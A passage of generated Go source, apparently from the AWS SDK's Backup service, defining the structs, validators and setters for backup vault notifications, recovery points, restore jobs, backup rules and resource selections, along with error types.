// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// The Amazon Resource Name (ARN) that specifies the topic for a backup vault’s
// events; for example, arn:aws:sns:us-west-2:111122223333:MyVaultTopic.
//
// SNSTopicArn is a required field
SNSTopicArn *string `type:"string" required:"true"`
}
// String returns the string representation
func (s PutBackupVaultNotificationsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PutBackupVaultNotificationsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *PutBackupVaultNotificationsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "PutBackupVaultNotificationsInput"}
if s.BackupVaultEvents == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultEvents"))
}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.SNSTopicArn == nil {
invalidParams.Add(request.NewErrParamRequired("SNSTopicArn"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultEvents sets the BackupVaultEvents field's value.
func (s *PutBackupVaultNotificationsInput) SetBackupVaultEvents(v []*string) *PutBackupVaultNotificationsInput {
s.BackupVaultEvents = v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *PutBackupVaultNotificationsInput) SetBackupVaultName(v string) *PutBackupVaultNotificationsInput {
s.BackupVaultName = &v
return s
}
// SetSNSTopicArn sets the SNSTopicArn field's value.
func (s *PutBackupVaultNotificationsInput) SetSNSTopicArn(v string) *PutBackupVaultNotificationsInput {
s.SNSTopicArn = &v
return s
}
type PutBackupVaultNotificationsOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s PutBackupVaultNotificationsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PutBackupVaultNotificationsOutput) GoString() string {
return s.String()
}
// Contains detailed information about the recovery points stored in a backup
// vault.
type RecoveryPointByBackupVault struct {
_ struct{} `type:"structure"`
// The size, in bytes, of a backup.
BackupSizeInBytes *int64 `type:"long"`
// An ARN that uniquely identifies a backup vault; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
BackupVaultName *string `type:"string"`
// A CalculatedLifecycle object containing DeleteAt and MoveToColdStorageAt
// timestamps.
CalculatedLifecycle *CalculatedLifecycle `type:"structure"`
// The date and time a job to restore a recovery point is completed, in Unix
// format and Coordinated Universal Time (UTC). The value of CompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// Contains identifying information about the creation of a recovery point,
// including the BackupPlanArn, BackupPlanId, BackupPlanVersion, and BackupRuleId
// of the backup plan that is used to create it.
CreatedBy *RecoveryPointCreator `type:"structure"`
// The date and time a recovery point is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The server-side encryption key that is used to protect your backups; for
// example, arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// A Boolean value that is returned as TRUE if the specified recovery point
// is encrypted, or FALSE if the recovery point is not encrypted.
IsEncrypted *bool `type:"boolean"`
// The date and time a recovery point was last restored, in Unix format and
// Coordinated Universal Time (UTC). The value of LastRestoreTime is accurate
// to milliseconds. For example, the value 1516925490.087 represents Friday,
// January 26, 2018 12:11:30.087 AM.
LastRestoreTime *time.Time `type:"timestamp"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource saved as a recovery point; for example, an Amazon
// Elastic Block Store (Amazon EBS) volume or an Amazon Relational Database
// Service (Amazon RDS) database. For VSS Windows backups, the only supported
// resource type is Amazon EC2.
ResourceType *string `type:"string"`
// The backup vault where the recovery point was originally copied from. If
// the recovery point is restored to the same account this value will be null.
SourceBackupVaultArn *string `type:"string"`
// A status code specifying the state of the recovery point.
Status *string `type:"string" enum:"RecoveryPointStatus"`
}
// String returns the string representation
func (s RecoveryPointByBackupVault) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s RecoveryPointByBackupVault) GoString() string {
return s.String()
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *RecoveryPointByBackupVault) SetBackupSizeInBytes(v int64) *RecoveryPointByBackupVault {
s.BackupSizeInBytes = &v
return s
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *RecoveryPointByBackupVault) SetBackupVaultArn(v string) *RecoveryPointByBackupVault {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *RecoveryPointByBackupVault) SetBackupVaultName(v string) *RecoveryPointByBackupVault {
s.BackupVaultName = &v
return s
}
// SetCalculatedLifecycle sets the CalculatedLifecycle field's value.
func (s *RecoveryPointByBackupVault) SetCalculatedLifecycle(v *CalculatedLifecycle) *RecoveryPointByBackupVault {
s.CalculatedLifecycle = v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *RecoveryPointByBackupVault) SetCompletionDate(v time.Time) *RecoveryPointByBackupVault {
s.CompletionDate = &v
return s
}
// SetCreatedBy sets the CreatedBy field's value.
func (s *RecoveryPointByBackupVault) SetCreatedBy(v *RecoveryPointCreator) *RecoveryPointByBackupVault {
s.CreatedBy = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *RecoveryPointByBackupVault) SetCreationDate(v time.Time) *RecoveryPointByBackupVault {
s.CreationDate = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *RecoveryPointByBackupVault) SetEncryptionKeyArn(v string) *RecoveryPointByBackupVault {
s.EncryptionKeyArn = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *RecoveryPointByBackupVault) SetIamRoleArn(v string) *RecoveryPointByBackupVault {
s.IamRoleArn = &v
return s
}
// SetIsEncrypted sets the IsEncrypted field's value.
func (s *RecoveryPointByBackupVault) SetIsEncrypted(v bool) *RecoveryPointByBackupVault {
s.IsEncrypted = &v
return s
}
// SetLastRestoreTime sets the LastRestoreTime field's value.
func (s *RecoveryPointByBackupVault) SetLastRestoreTime(v time.Time) *RecoveryPointByBackupVault {
s.LastRestoreTime = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *RecoveryPointByBackupVault) SetLifecycle(v *Lifecycle) *RecoveryPointByBackupVault {
s.Lifecycle = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *RecoveryPointByBackupVault) SetRecoveryPointArn(v string) *RecoveryPointByBackupVault {
s.RecoveryPointArn = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *RecoveryPointByBackupVault) SetResourceArn(v string) *RecoveryPointByBackupVault {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *RecoveryPointByBackupVault) SetResourceType(v string) *RecoveryPointByBackupVault {
s.ResourceType = &v
return s
}
// SetSourceBackupVaultArn sets the SourceBackupVaultArn field's value.
func (s *RecoveryPointByBackupVault) SetSourceBackupVaultArn(v string) *RecoveryPointByBackupVault {
s.SourceBackupVaultArn = &v
return s
}
// SetStatus sets the Status field's value.
func (s *RecoveryPointByBackupVault) SetStatus(v string) *RecoveryPointByBackupVault {
s.Status = &v
return s
}
// Contains detailed information about a saved recovery point.
type RecoveryPointByResource struct {
_ struct{} `type:"structure"`
// The size, in bytes, of a backup.
BackupSizeBytes *int64 `type:"long"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
BackupVaultName *string `type:"string"`
// The date and time a recovery point is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The server-side encryption key that is used to protect your backups; for
// example, arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// A status code specifying the state of the recovery point.
Status *string `type:"string" enum:"RecoveryPointStatus"`
}
// String returns the string representation
func (s RecoveryPointByResource) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s RecoveryPointByResource) GoString() string {
return s.String()
}
// SetBackupSizeBytes sets the BackupSizeBytes field's value.
func (s *RecoveryPointByResource) SetBackupSizeBytes(v int64) *RecoveryPointByResource {
s.BackupSizeBytes = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *RecoveryPointByResource) SetBackupVaultName(v string) *RecoveryPointByResource {
s.BackupVaultName = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *RecoveryPointByResource) SetCreationDate(v time.Time) *RecoveryPointByResource {
s.CreationDate = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *RecoveryPointByResource) SetEncryptionKeyArn(v string) *RecoveryPointByResource {
s.EncryptionKeyArn = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *RecoveryPointByResource) SetRecoveryPointArn(v string) *RecoveryPointByResource {
s.RecoveryPointArn = &v
return s
}
// SetStatus sets the Status field's value.
func (s *RecoveryPointByResource) SetStatus(v string) *RecoveryPointByResource {
s.Status = &v
return s
}
// Contains information about the backup plan and rule that AWS Backup used
// to initiate the recovery point backup.
type RecoveryPointCreator struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// Version IDs are unique, randomly generated, Unicode, UTF-8 encoded strings
// that are at most 1,024 bytes long. They cannot be edited.
BackupPlanVersion *string `type:"string"`
// Uniquely identifies a rule used to schedule the backup of a selection of
// resources.
BackupRuleId *string `type:"string"`
}
// String returns the string representation
func (s RecoveryPointCreator) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s RecoveryPointCreator) GoString() string {
return s.String()
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *RecoveryPointCreator) SetBackupPlanArn(v string) *RecoveryPointCreator {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *RecoveryPointCreator) SetBackupPlanId(v string) *RecoveryPointCreator {
s.BackupPlanId = &v
return s
}
// SetBackupPlanVersion sets the BackupPlanVersion field's value.
func (s *RecoveryPointCreator) SetBackupPlanVersion(v string) *RecoveryPointCreator {
s.BackupPlanVersion = &v
return s
}
// SetBackupRuleId sets the BackupRuleId field's value.
func (s *RecoveryPointCreator) SetBackupRuleId(v string) *RecoveryPointCreator {
s.BackupRuleId = &v
return s
}
// A resource that is required for the action doesn't exist.
type ResourceNotFoundException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s ResourceNotFoundException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ResourceNotFoundException) GoString() string {
return s.String()
}
func newErrorResourceNotFoundException(v protocol.ResponseMetadata) error {
return &ResourceNotFoundException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *ResourceNotFoundException) Code() string {
return "ResourceNotFoundException"
}
// Message returns the exception's message.
func (s *ResourceNotFoundException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *ResourceNotFoundException) OrigErr() error {
return nil
}
func (s *ResourceNotFoundException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// Status code returns the HTTP status code for the request's response error.
func (s *ResourceNotFoundException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *ResourceNotFoundException) RequestID() string {
return s.RespMetadata.RequestID
}
// Contains metadata about a restore job.
type RestoreJobsListMember struct {
_ struct{} `type:"structure"`
// The account ID that owns the restore job.
AccountId *string `type:"string"`
// The size, in bytes, of the restored resource.
BackupSizeInBytes *int64 `type:"long"`
// The date and time a job to restore a recovery point is completed, in Unix
// format and Coordinated Universal Time (UTC). The value of CompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource. The format
// of the ARN depends on the resource type.
CreatedResourceArn *string `type:"string"`
// The date and time a restore job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The amount of time in minutes that a job restoring a recovery point is expected
// to take.
ExpectedCompletionTimeMinutes *int64 `type:"long"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// Contains an estimated percentage complete of a job at the time the job status
// was queried.
PercentDone *string `type:"string"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// The resource type of the listed restore jobs; for example, an Amazon Elastic
// Block Store (Amazon EBS) volume or an Amazon Relational Database Service
// (Amazon RDS) database. For VSS Windows backups, the only supported resource
// type is Amazon EC2.
ResourceType *string `type:"string"`
// Uniquely identifies the job that restores a recovery point.
RestoreJobId *string `type:"string"`
// A status code specifying the state of the job initiated by AWS Backup to
// restore a recovery point.
Status *string `type:"string" enum:"RestoreJobStatus"`
// A detailed message explaining the status of the job to restore a recovery
// point.
StatusMessage *string `type:"string"`
}
// String returns the string representation
func (s RestoreJobsListMember) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s RestoreJobsListMember) GoString() string {
return s.String()
}
// SetAccountId sets the AccountId field's value.
func (s *RestoreJobsListMember) SetAccountId(v string) *RestoreJobsListMember {
s.AccountId = &v
return s
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *RestoreJobsListMember) SetBackupSizeInBytes(v int64) *RestoreJobsListMember {
s.BackupSizeInBytes = &v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *RestoreJobsListMember) SetCompletionDate(v time.Time) *RestoreJobsListMember {
s.CompletionDate = &v
return s
}
// SetCreatedResourceArn sets the CreatedResourceArn field's value.
func (s *RestoreJobsListMember) SetCreatedResourceArn(v string) *RestoreJobsListMember {
s.CreatedResourceArn = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *RestoreJobsListMember) SetCreationDate(v time.Time) *RestoreJobsListMember {
s.CreationDate = &v
return s
}
// SetExpectedCompletionTimeMinutes sets the ExpectedCompletionTimeMinutes field's value.
func (s *RestoreJobsListMember) SetExpectedCompletionTimeMinutes(v int64) *RestoreJobsListMember {
s.ExpectedCompletionTimeMinutes = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *RestoreJobsListMember) SetIamRoleArn(v string) *RestoreJobsListMember {
s.IamRoleArn = &v
return s
}
// SetPercentDone sets the PercentDone field's value.
func (s *RestoreJobsListMember) SetPercentDone(v string) *RestoreJobsListMember {
s.PercentDone = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *RestoreJobsListMember) SetRecoveryPointArn(v string) *RestoreJobsListMember {
s.RecoveryPointArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *RestoreJobsListMember) SetResourceType(v string) *RestoreJobsListMember {
s.ResourceType = &v
return s
}
// SetRestoreJobId sets the RestoreJobId field's value.
func (s *RestoreJobsListMember) SetRestoreJobId(v string) *RestoreJobsListMember {
s.RestoreJobId = &v
return s
}
// SetStatus sets the Status field's value.
func (s *RestoreJobsListMember) SetStatus(v string) *RestoreJobsListMember {
s.Status = &v
return s
}
// SetStatusMessage sets the StatusMessage field's value.
func (s *RestoreJobsListMember) SetStatusMessage(v string) *RestoreJobsListMember {
s.StatusMessage = &v
return s
}
// Specifies a scheduled task used to back up a selection of resources.
type Rule struct {
_ struct{} `type:"structure"`
// A value in minutes after a backup job is successfully started before it must
// be completed or it will be canceled by AWS Backup. This value is optional.
CompletionWindowMinutes *int64 `type:"long"`
// An array of CopyAction objects, which contains the details of the copy operation.
CopyActions []*CopyAction `type:"list"`
// Specifies whether AWS Backup creates continuous backups. True causes AWS
// Backup to create continuous backups capable of point-in-time restore (PITR).
// False (or not specified) causes AWS Backup to create snapshot backups.
EnableContinuousBackup *bool `type:"boolean"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// An array of key-value pair strings that are assigned to resources that are
// associated with this rule when restored from backup.
RecoveryPointTags map[string]*string `type:"map" sensitive:"true"`
// Uniquely identifies a rule that is used to schedule the backup of a selection
// of resources.
RuleId *string `type:"string"`
// An optional display name for a backup rule.
//
// RuleName is a required field
RuleName *string `type:"string" required:"true"`
// A CRON expression specifying when AWS Backup initiates a backup job. For
// more information about cron expressions, see Schedule Expressions for Rules
// (https://docs.aws.amazon.com/AmazonCloudWatch/latest/events/ScheduledEvents.html)
// in the Amazon CloudWatch Events User Guide.. Prior to specifying a value
// for this parameter, we recommend testing your cron expression using one of
// the many available cron generator and testing tools.
ScheduleExpression *string `type:"string"`
// A value in minutes after a backup is scheduled before a job will be canceled
// if it doesn't start successfully. This value is optional.
StartWindowMinutes *int64 `type:"long"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// TargetBackupVaultName is a required field
TargetBackupVaultName *string `type:"string" required:"true"`
}
// String returns the string representation
func (s Rule) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Rule) GoString() string {
return s.String()
}
// SetCompletionWindowMinutes sets the CompletionWindowMinutes field's value.
func (s *Rule) SetCompletionWindowMinutes(v int64) *Rule {
s.CompletionWindowMinutes = &v
return s
}
// SetCopyActions sets the CopyActions field's value.
func (s *Rule) SetCopyActions(v []*CopyAction) *Rule {
s.CopyActions = v
return s
}
// SetEnableContinuousBackup sets the EnableContinuousBackup field's value.
func (s *Rule) SetEnableContinuousBackup(v bool) *Rule {
s.EnableContinuousBackup = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *Rule) SetLifecycle(v *Lifecycle) *Rule {
s.Lifecycle = v
return s
}
// SetRecoveryPointTags sets the RecoveryPointTags field's value.
func (s *Rule) SetRecoveryPointTags(v map[string]*string) *Rule {
s.RecoveryPointTags = v
return s
}
// SetRuleId sets the RuleId field's value.
func (s *Rule) SetRuleId(v string) *Rule {
s.RuleId = &v
return s
}
// SetRuleName sets the RuleName field's value.
func (s *Rule) SetRuleName(v string) *Rule {
s.RuleName = &v
return s
}
// SetScheduleExpression sets the ScheduleExpression field's value.
func (s *Rule) SetScheduleExpression(v string) *Rule {
s.ScheduleExpression = &v
return s
}
// SetStartWindowMinutes sets the StartWindowMinutes field's value.
func (s *Rule) SetStartWindowMinutes(v int64) *Rule {
s.StartWindowMinutes = &v
return s
}
// SetTargetBackupVaultName sets the TargetBackupVaultName field's value.
func (s *Rule) SetTargetBackupVaultName(v string) *Rule {
s.TargetBackupVaultName = &v
return s
}
// Specifies a scheduled task used to back up a selection of resources.
type RuleInput struct {
_ struct{} `type:"structure"`
// A value in minutes after a backup job is successfully started before it must
// be completed or it will be canceled by AWS Backup. This value is optional.
CompletionWindowMinutes *int64 `type:"long"`
// An array of CopyAction objects, which contains the details of the copy operation.
CopyActions []*CopyAction `type:"list"`
// Specifies whether AWS Backup creates continuous backups. True causes AWS
// Backup to create continuous backups capable of point-in-time restore (PITR).
// False (or not specified) causes AWS Backup to create snapshot backups.
EnableContinuousBackup *bool `type:"boolean"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup will transition and expire backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// To help organize your resources, you can assign your own metadata to the
// resources that you create. Each tag is a key-value pair.
RecoveryPointTags map[string]*string `type:"map" sensitive:"true"`
// An optional display name for a backup rule.
//
// RuleName is a required field
RuleName *string `type:"string" required:"true"`
// A CRON expression specifying when AWS Backup initiates a backup job.
ScheduleExpression *string `type:"string"`
// A value in minutes after a backup is scheduled before a job will be canceled
// if it doesn't start successfully. This value is optional.
StartWindowMinutes *int64 `type:"long"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// TargetBackupVaultName is a required field
TargetBackupVaultName *string `type:"string" required:"true"`
}
// String returns the string representation
func (s RuleInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s RuleInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *RuleInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "RuleInput"}
if s.RuleName == nil {
invalidParams.Add(request.NewErrParamRequired("RuleName"))
}
if s.TargetBackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("TargetBackupVaultName"))
}
if s.CopyActions != nil {
for i, v := range s.CopyActions {
if v == nil {
continue
}
if err := v.Validate(); err != nil {
invalidParams.AddNested(fmt.Sprintf("%s[%v]", "CopyActions", i), err.(request.ErrInvalidParams))
}
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetCompletionWindowMinutes sets the CompletionWindowMinutes field's value.
func (s *RuleInput) SetCompletionWindowMinutes(v int64) *RuleInput {
s.CompletionWindowMinutes = &v
return s
}
// SetCopyActions sets the CopyActions field's value.
func (s *RuleInput) SetCopyActions(v []*CopyAction) *RuleInput {
s.CopyActions = v
return s
}
// SetEnableContinuousBackup sets the EnableContinuousBackup field's value.
func (s *RuleInput) SetEnableContinuousBackup(v bool) *RuleInput {
s.EnableContinuousBackup = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *RuleInput) SetLifecycle(v *Lifecycle) *RuleInput {
s.Lifecycle = v
return s
}
// SetRecoveryPointTags sets the RecoveryPointTags field's value.
func (s *RuleInput) SetRecoveryPointTags(v map[string]*string) *RuleInput {
s.RecoveryPointTags = v
return s
}
// SetRuleName sets the RuleName field's value.
func (s *RuleInput) SetRuleName(v string) *RuleInput {
s.RuleName = &v
return s
}
// SetScheduleExpression sets the ScheduleExpression field's value.
func (s *RuleInput) SetScheduleExpression(v string) *RuleInput {
s.ScheduleExpression = &v
return s
}
// SetStartWindowMinutes sets the StartWindowMinutes field's value.
func (s *RuleInput) SetStartWindowMinutes(v int64) *RuleInput {
s.StartWindowMinutes = &v
return s
}
// SetTargetBackupVaultName sets the TargetBackupVaultName field's value.
func (s *RuleInput) SetTargetBackupVaultName(v string) *RuleInput {
s.TargetBackupVaultName = &v
return s
}
// Used to specify a set of resources to a backup plan.
type Selection struct {
_ struct{} `type:"structure"`
// The ARN of the IAM role that AWS Backup uses to authenticate when backing
// up the target resource; for example, arn:aws:iam::123456789012:role/S3Access.
//
// IamRoleArn is a required field
IamRoleArn *string `type:"string" required:"true"`
// An array of conditions used to specify a set of resources to assign to a
// backup plan; for example, "StringEquals": {"ec2:ResourceTag/Department":
// "accounting". Assigns the backup plan to every resource with at least one
// matching tag.
ListOfTags []*Condition `type:"list"`
// An array of strings that contain Amazon Resource Names (ARNs) of resources
// to assign to a backup plan.
Resources []*string `type:"list"`
// The display name of a resource selection document.
//
// SelectionName is a required field
SelectionName *string `type:"string" required:"true"`
}
// String returns the string representation
func (s Selection) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Selection) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *Selection) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "Selection"}
if s.IamRoleArn == nil {
invalidParams.Add(request.NewErrParamRequired("IamRoleArn"))
}
if s.SelectionName == nil {
invalidParams.Add(request.NewErrParamRequired("SelectionName"))
}
if s.ListOfTags != nil {
for i, v := range s.ListOfTags {
if v == nil {
continue
}
if err := v.Validate(); err != nil {
invalidParams.AddNested(fmt.Sprintf("%s[%v]", "ListOfTags", i), err.(request.ErrInvalidParams))
}
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *Selection) SetIamRoleArn(v string) *Selection {
s.IamRoleArn = &v
return s
}
// SetListOfTags sets the ListOfTags field's value.
func (s *Selection) SetListOfTags(v []*Condition) *Selection {
s.ListOfTags = v
return s
}
// SetResources sets the Resources field's value.
func (s *Selection) SetResources(v []*string) *Selection {
s.Resources = v
return s
}
// SetSelectionName sets the SelectionName field's value.
func (s *Selection) SetSelectionName(v string) *Selection {
s.SelectionName = &v
return s
}
// Contains metadata about a BackupSelection object.
type SelectionsListMember struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time a backup plan is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// Specifies the IAM role Amazon Resource Name (ARN) to create the target recovery
// point; for example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// Uniquely identifies a request to assign a set of resources to a backup plan.
SelectionId *string `type:"string"`
// The display name of a resource selection document.
SelectionName *string `type:"string"`
}
// String returns the string representation
func (s SelectionsListMember) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s SelectionsListMember) GoString() string {
return s.String()
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *SelectionsListMember) SetBackupPlanId(v string) *SelectionsListMember {
s.BackupPlanId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *SelectionsListMember) SetCreationDate(v time.Time) *SelectionsListMember {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *SelectionsListMember) SetCreatorRequestId(v string) *SelectionsListMember {
s.CreatorRequestId = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *SelectionsListMember) SetIamRoleArn(v string) *SelectionsListMember {
s.IamRoleArn = &v
return s
}
// SetSelectionId sets the SelectionId field's value.
func (s *SelectionsListMember) SetSelectionId(v string) *SelectionsListMember {
s.SelectionId = &v
return s
}
// SetSelectionName sets the SelectionName field's value.
func (s *SelectionsListMember) SetSelectionName(v string) *SelectionsListMember {
s.SelectionName = &v
return s
}
// The request failed due to a temporary failure of the server.
type ServiceUnavailableException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s ServiceUnavailableException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ServiceUnavailableException) GoString() string {
return s.String()
}
func newErrorServiceUnavailableException(v protocol.ResponseMetadata) error {
return &ServiceUnavailableException{
